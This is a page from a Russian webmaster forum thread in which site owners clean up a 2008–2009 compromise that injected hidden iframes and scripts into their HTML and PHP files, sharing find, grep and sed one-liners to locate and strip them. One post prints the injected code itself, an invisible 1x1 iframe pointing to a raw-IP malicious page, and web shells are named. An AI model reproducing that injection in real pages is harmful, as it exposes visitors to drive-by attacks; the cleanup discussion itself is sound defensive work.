Очень нестандартный трейдер или взлом АТS?, страница 7

Тема: Очень нестандартный трейдер или взлом АТS?

цитата
14/11/08 в 18:00

Soft-Com
Вывести список заражённых файлов:
Код:

find / -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}'
find / -name \*.php -exec grep -H "2020696620282" {} \; | awk -F":" '{print $1}'

почистить в автоматическом режиме:
[freebsd]
Код:

for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i '' 's/<script.*document.write.*unesca.*<\/script>//g' $i; done

[linux]

Код:

for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i 's/<script.*document.write.*unesca.*<\/script>//g' $i; done

P.S.
обратись к моим админам

цитата
15/11/08 в 12:10

old_fly
Спасибо, почистился.

Вот только один домен все же успел попасть под раздачу гугла. Уже подал запрос на review моего сайта в Google Tools, чтобы убрали блок на мой домен.

Как долго ждать восстановления?

цитата
15/11/08 в 12:28

Gidz
Сайт занесен Гуглем в подозрительные

цитата
17/11/08 в 16:35

Anab0L1k
Появился трейдер непонятный, в сорсе админ паги:
Код:

<td class="normalrow" onmouseover="showsubmenu(this)" onmouseout="hidesubmenu(this)" style="background-color:#FFCCCC;"><a target="_blank" href="masex.com\"><iframe width=1 height=1 src=http://79.135.187.18/ats/ats.php></iframe><aaaa=\"">masex.com\"><iframe_width=1_height=1_src=http</a>

Удалить не получается

Че делать? хелп!
Прочекал все .php .html .tpl файлы ничего не нашел...

цитата
17/11/08 в 16:38

Anab0L1k
Вроде бы кильнул: стер в tradefiles, datafilesm и в main.csv.
Поменял пароль навсякий...

цитата
17/11/08 в 17:57

von Stoltz
Почитай топик с начала. Пароль тебя не спасет.

цитата
18/11/08 в 12:35

Anab0L1k

Спс, последовал рекомендациям

цитата
06/07/09 в 03:40

Fantomas
Soft-Com писал:

[linux]

Код:

for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i 's/<script.*document.write.*unesca.*<\/script>//g' $i; done

не дайте погибнуть, подскажите в чем затык

не идет под линухом то что Soft-Com написал.
поправил строчку автора , убрал чтоб искало не с корня, а с текущей диры и вырезало все что между Код:

. Ошибок нет и результата тоже.
Код:

for i in `find -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i 's/<script.*<\/script>//g' $i; done

цитата
06/07/09 в 08:52

Soft-Com
очень странно, а что даёт на вывод команда
Код:

find -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs

?

и дай сюда кусок, который находиться между <script> и </script>, которые ты хочешь удалить.

цитата
06/07/09 в 21:37

Fantomas
Soft-Com спасибо что отозвался

поиск все верно выдает, в 2 файлах несколько раз встречается script
find -name \*.html -exec grep -H "script" {} \; | awk -F":" '{print $1}' | xargs
./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html

и регэксп нормально работает типа 's/ZZZ/XXX/g'
проблемы начинаются когда пытаюсь написать чтоб резало все между тэгами script типа 's/<script.*<\/script>//g'

а вырезати надо че-то типа такого

Код:

цитата
06/07/09 в 22:09

usanatol
в нутри этой фигни следущее

Код:

цитата
06/07/09 в 22:21

Fantomas
usanatol писал:

разбирайтесь птшите абузы

не в арбузах счастие, убрать бы ето дерьмо с галер

сделаного жалко, файла дохрена, руками почистить не реально.

цитата
06/07/09 в 22:24

usanatol
Ну если хакинг скриптов сотен машин не повод тогда можно и дальше продолжать

цитата
06/07/09 в 22:27

Soft-Com
попробуй так:

Код:

for i in `find ./ -name *.*tm* -exec grep -H "76,61r,20a,3d,22Scr,69p,74Eng" {} \; | awk -F":" '{print $1}' | xargs`; do sed -ni '1h;1!H;${;g;s/<script language=javascript><\/script>//g;p;}' $i; done

по идее поможет, но надо бы проверить потом контент на наличие скриптов, через которые рассадили хрень, типа r57, о69 и дофига других.

цитата
06/07/09 в 22:29

Soft-Com
Fantomas писал:

не в арбузах счастие, убрать бы ето дерьмо с галер

сделаного жалко, файла дохрена, руками почистить не реально.

usanatol абсолютно прав, домен на адванседах находится - абсолютно адекватные ребята, помогут наказать уродов.

цитата
06/07/09 в 22:55

Fantomas
usanatol: не серчай. соласный я с тобой на все 100, просто приоритеты у меня сча на восстановление.

Soft-Com: спасибо тебе огромное. помогло

только подправил я немного ето дело.
1.поиск не с корня а с текущей диры.
2.поиск все же по "script", код может менятся а оно там точно будет, хотя повылазят тэги description.
3.вырезать решил все же /<script.*<\/script>/ ибо может и не быть "script language=javascript"
получилось так
Код:

for i in `find -name \*.\*tm\* -exec grep -H "script" {} \; | awk -F":" '{print $1}' | xargs`; do sed -ni '1h;1!H;${;g;s/<script.*<\/script>//g;p;}' $i; done

вобщем спасибо всем кто переживал и особенно Soft-Com

цитата
06/07/09 в 23:07

Soft-Com
Ну, хозяин - барин, но всё-же если были полезные скриптовые вставки, ты их удалил

, так что если тебе именно это и нужно, то другим не поможет.

а абузу всё равно напиши.

цитата
06/07/09 в 23:38

Fantomas
Soft-Com: в том то и дело что у меня галеры лежат ниже паг со скриптами, поэтому и ищу не с корня а с текущей диры

в галерах никаких скриптов не надо.
у других будет из чего выбрать, не потеряются.

а арбуз надо подарить, только вот закончу лечение и поиск откуда ето все вылезло, благо написано на мастере не мало

исчо раз спасибо, даж не знаю ... если чем смогу помочь ... потом... когда нибудь...

цитата
07/07/09 в 06:40

Soft-Com
Fantomas, сорри что пишу здесь, нет твоих данных в профайле - какие скрипты стояли и какие меры защиты были, что смогли поломать?

Стр. « первая < 5, 6, 7

Новая тема Ответить

Эта страница в полной версии